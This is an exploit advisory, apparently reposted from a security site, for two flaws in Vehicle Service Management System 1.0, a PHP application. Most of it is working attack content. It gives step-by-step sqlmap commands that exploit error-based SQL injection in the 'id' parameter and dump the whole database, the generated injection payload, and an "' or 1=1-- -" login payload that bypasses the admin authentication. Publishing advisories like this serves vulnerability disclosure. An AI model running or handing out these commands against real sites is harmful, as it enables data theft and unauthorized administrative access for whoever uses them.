Vehicle Service Management System 1.0 SQL Injection

2021.10.05
Credit: Richard Jones
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Vehicle Service Managment 1.0 - SQL Injection Error Based # Date: 2021-10-02 # Exploit Author: RICHARD JONES # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 - Open sqlmap Step 2 – Enter the payload string for sqlmap (edit localhost to site address) Setp 3 - Dump database info. SQLMAP Command: sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E Results: Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa Step 3: Dump the entire database. sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump # Exploit Title: Vehicle Service Managment 1.0 - SQL Authentication Bypass # Date: 2021-10-02 # Exploit Author: RICHARD JONES # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 - Goto http://site/admin/login.php (to login) Step 2 – Enter the payload below for username and password Setp 3 - Login as admin! Payload: ' or 1=1-- - # Profit


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top